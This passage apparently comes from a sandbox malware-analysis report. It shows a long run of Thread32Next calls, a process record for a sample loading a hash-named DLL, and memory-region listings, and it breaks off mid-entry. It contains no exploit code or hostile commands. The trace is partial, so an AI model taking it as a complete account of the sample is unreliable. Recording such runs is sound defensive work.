Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.335] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.335] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.336] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.337] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.337] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.338] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.338] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.339] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.340] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.340] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.341] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.342] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.342] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.343] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.344] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.345] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.346] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.346] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.347] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.348] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.348] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.349] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.349] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.350] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.351] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.351] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.352] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.353] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.354] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.354] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.355] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.356] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.356] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.357] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.358] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.358] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.359] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.502] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.503] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.503] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.504] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.505] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.505] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.507] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.508] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.509] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.510] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.510] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.511] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.511] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.512] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.513] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.514] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.514] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.515] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.515] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.516] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.517] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.518] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.518] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.519] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.520] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.520] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.521] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.522] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.523] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.523] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.524] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.525] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.525] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.526] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.527] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.528] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.529] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.529] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.530] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.531] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.532] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.533] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.534] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.535] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.535] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.536] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.537] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.658] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.659] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.659] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.660] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.661] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.662] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.663] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.663] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.664] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.665] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.666] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.666] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.667] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.668] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.669] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.670] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.671] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.671] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.672] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.673] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.674] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.675] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.676] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.677] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.678] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.678] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.679] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.680] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.681] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.682] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.683] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.684] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.684] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.685] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.686] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.687] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.687] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.688] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.689] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.690] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.691] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.692] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.692] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.693] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.694] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.875] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.876] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.877] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.878] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.879] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.880] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.880] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.881] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.883] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.884] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.885] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.886] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.887] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.888] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.889] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.890] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.891] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.891] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.893] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.894] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.895] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.896] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.897] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.898] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.899] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.900] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.900] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.902] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.903] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.903] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.904] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.905] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.906] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.907] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.907] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.908] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.909] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.910] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.007] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.008] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.009] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.009] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.011] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.012] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.013] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.013] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.014] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.015] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.016] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.017] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.017] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.018] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.021] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.021] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.022] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.023] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.024] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.024] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.025] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.026] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.027] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.028] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.029] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.030] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.031] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.032] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.033] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.034] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.034] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.036] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.037] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.037] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.038] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.039] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.040] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.040] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.041] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.042] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.174] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.175] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.175] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.176] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.176] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.178] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.178] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.179] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.179] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.180] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.180] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.181] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.182] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.182] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.183] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.184] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.184] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.185] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.185] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.186] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.187] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.187] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.188] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.189] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.190] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.190] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.191] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.192] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.192] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.193] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.194] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.194] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.195] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.196] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.196] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.197] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.197] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.198] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.199] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.199] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.200] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.201] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.202] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.203] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.203] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.204] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.204] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.205] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.206] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.207] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.211] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.212] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.329] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.329] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.330] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.331] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.332] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.332] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.333] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.334] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.334] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.335] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.335] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.336] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.337] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.337] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.338] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.339] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.339] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.340] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.341] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.341] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.342] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.343] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.344] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.344] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.345] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.345] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.346] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.347] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.347] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.348] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.349] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.350] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.350] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.351] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.352] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.352] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.353] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.354] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.355] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.355] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.356] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.357] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.357] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.358] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.358] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.359] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.359] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.360] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.361] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.361] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.362] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.363] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.509] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.510] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.510] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.511] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.512] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.513] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.513] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.514] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.515] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.516] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.516] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.517] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.518] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.519] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.520] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.521] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.521] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.522] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.524] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.525] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.526] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0275.527] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 Thread: id = 221 os_tid = 0x530 Process: id = "32" image_name = "giumlol.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe" page_root = "0x73c36000" os_pid = "0xcb8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xcc8" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_get_num_cpus" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13585 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13586 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13587 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 13588 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 13589 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 13590 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 13591 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 13592 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13593 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 